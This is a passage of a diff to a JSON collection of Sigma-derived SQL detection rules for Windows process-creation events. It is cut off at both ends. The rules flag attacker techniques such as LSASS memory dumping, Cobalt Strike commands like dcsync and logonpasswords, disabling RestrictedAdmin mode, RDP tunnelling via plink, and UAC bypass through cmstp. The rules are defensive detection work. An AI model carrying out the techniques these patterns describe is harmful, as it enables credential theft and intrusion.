'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "status": "experimental", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "status": "experimental", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1564.004" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\')) AND NOT ((NewProcessName = '') OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName IN ('-', '')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%.scr' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Administrative activity", + "Software installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { "title": "Suspicious Rundll32 Invoking Inline VBScript", @@ -11241,1218 +10891,1209 @@ "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", - "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "status": "test", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR 